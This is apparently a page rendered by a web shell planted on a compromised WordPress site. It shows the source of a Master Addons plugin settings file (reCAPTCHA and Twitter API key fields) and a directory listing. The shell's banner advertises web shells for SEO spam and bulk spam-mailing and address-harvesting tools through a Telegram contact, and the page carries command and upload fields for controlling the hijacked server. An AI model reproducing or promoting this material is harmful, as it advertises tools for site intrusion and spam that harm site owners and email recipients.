__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<div class="jltma-master-addons-tab-panel" id="jltma-master-addons-api-keys" style="display: none;">
	<div class="jltma-master-addons-features">
		<div class="jltma-tab-dashboard-header-wrapper">
			<div class="jltma-tab-dashboard-header-right is-flex">
				<button type="submit" class="jltma-button jltma-tab-element-save-setting">
					<?php _e('Save Settings', 'master-addons' ); ?>
				</button>
			</div>
		</div>

		<?php $jltma_api_options = get_option('jltma_api_save_settings'); ?>

		<div class="jltma-tab-dashboard-wrapper">
			<form action="" method="POST" id="jltma-api-forms-settings" class="jltma-api-forms-settings" name="jltma-api-forms-settings">
				<?php wp_nonce_field('jltma_api_settings_nonce_action'); ?>
				<div class="jltma-addons-dashboard-tabs-wrapper is-flex">
					<!-- Start of reCaptcha Settings -->
					<div class="jltma-api-settings-element jltma-half">
						<h4><?php echo esc_html__('reCaptcha Settings', 'master-addons' ); ?></h4>
						<div class="jltma-api-element-inner">
							<div class="jltma-api-forms">

								<div class="jltma-form-group is-flex">
									<label for="recaptcha_site_key">
										<?php echo esc_html__('reCAPTCHA Site key', 'master-addons' ); ?>
									</label>
									<input name="recaptcha_site_key" type="text" class="jltma-form-control recaptcha_site_key" value="<?php echo isset($jltma_api_options['recaptcha_site_key']) ? esc_attr($jltma_api_options['recaptcha_site_key']) : ""; ?>">
								</div>

								<div class="jltma-form-group is-flex">
									<label for="recaptcha_secret_key">
										<?php echo esc_html__('reCAPTCHA Secret key', 'master-addons' ); ?>
									</label>
									<input type="text" name="recaptcha_secret_key" class="jltma-form-control recaptcha_secret_key" value="<?php echo isset($jltma_api_options['recaptcha_secret_key']) ? esc_attr($jltma_api_options['recaptcha_secret_key']) : ""; ?>">
								</div>

								<p>
									<?php echo /* translators: %s: Google reCaptcha Url */ sprintf(__('Go to your Google <a href="%1$s" target="_blank"> reCAPTCHA</a> > Account > Generate Keys (reCAPTCHA V2 > Invisible) and Copy and Paste here.', 'master-addons' ), esc_url('https://www.google.com/recaptcha/about/'));
									?>
								</p>
							</div>
						</div><!-- /.jltma-api-element-inner -->
					</div><!-- /.jltma-api-settings-element -->
					<!-- End of reCaptcha Settings -->



					<!-- Start of Twitter Settings -->
					<div class="jltma-api-settings-element jltma-half">
						<h4><?php echo esc_html__('Twitter Settings', 'master-addons' ); ?></h4>
						<div class="jltma-api-element-inner">
							<div class="jltma-api-forms">

								<div class="jltma-form-group is-flex">
									<label for="twitter_username">
										<?php echo esc_html__('Username', 'master-addons' ); ?>
									</label>
									<input name="twitter_username" type="text" class="jltma-form-control twitter_username" value="<?php echo isset($jltma_api_options['twitter_username']) ? esc_attr($jltma_api_options['twitter_username']) : ""; ?>">
								</div>

								<div class="jltma-form-group is-flex">
									<label for="twitter_consumer_key">
										<?php echo esc_html__('Consumer Key', 'master-addons' ); ?>
									</label>
									<input name="twitter_consumer_key" type="text" class="jltma-form-control twitter_consumer_key" value="<?php echo isset($jltma_api_options['twitter_consumer_key']) ? esc_attr($jltma_api_options['twitter_consumer_key']) : ""; ?>">
								</div>

								<div class="jltma-form-group is-flex">
									<label for="twitter_consumer_secret">
										<?php echo esc_html__('Consumer Secret', 'master-addons' ); ?>
									</label>
									<input type="text" name="twitter_consumer_secret" class="jltma-form-control twitter_consumer_secret" value="<?php echo isset($jltma_api_options['twitter_consumer_secret']) ? esc_attr($jltma_api_options['twitter_consumer_secret']) : ""; ?>">
								</div>

								<div class="jltma-form-group is-flex">
									<label for="twitter_access_token">
										<?php echo esc_html__('Access Token', 'master-addons' ); ?>
									</label>
									<input type="text" name="twitter_access_token" class="jltma-form-control twitter_access_token" value="<?php echo isset($jltma_api_options['twitter_access_token']) ? esc_attr($jltma_api_options['twitter_access_token']) : ""; ?>">
								</div>

								<div class="jltma-form-group is-flex">
									<label for="twitter_access_token_secret">
										<?php echo esc_html__('Access Token Secret', 'master-addons' ); ?>
									</label>
									<input type="text" name="twitter_access_token_secret" class="jltma-form-control twitter_access_token_secret" value="<?php echo isset($jltma_api_options['twitter_access_token_secret']) ? esc_attr($jltma_api_options['twitter_access_token_secret']) : ""; ?>">
								</div>

								<p>
									<?php echo /* translators: %s: Twitter Url */ sprintf(__('Go to <a href="%1$s" target="_blank"> https://developer.twitter.com/en/apps/create</a> for creating your Consumer key and Access Token.', 'master-addons' ), esc_url('https://developer.twitter.com/en/apps/create'));
									?>
								</p>
							</div>
						</div><!-- /.jltma-api-element-inner -->
					</div><!-- /.jltma-api-settings-element -->
					<!-- End of Twitter Settings -->
				</div>
			</form>
		</div>
	</div>
</div>

Filemanager

Name Type Size Permission Actions
addons-elements.php File 3.22 KB 0775
addons-forms.php File 2.67 KB 0775
addons-marketing.php File 3.24 KB 0775
addons.php File 1.12 KB 0775
api-keys.php File 5.25 KB 0775
changelogs.php File 630 B 0775
extensions.php File 5.69 KB 0775
icons-library.php File 6.4 KB 0775
navigation.php File 2.07 KB 0775
right-column.php File 1.9 KB 0775
supports.php File 9.93 KB 0775
system-info.php File 25.66 KB 0775
third-party-plugins.php File 3.7 KB 0775
version-control.php File 1.81 KB 0775
white-label.php File 16.23 KB 0775
widget-stats.php File 5.67 KB 0775
Filemanager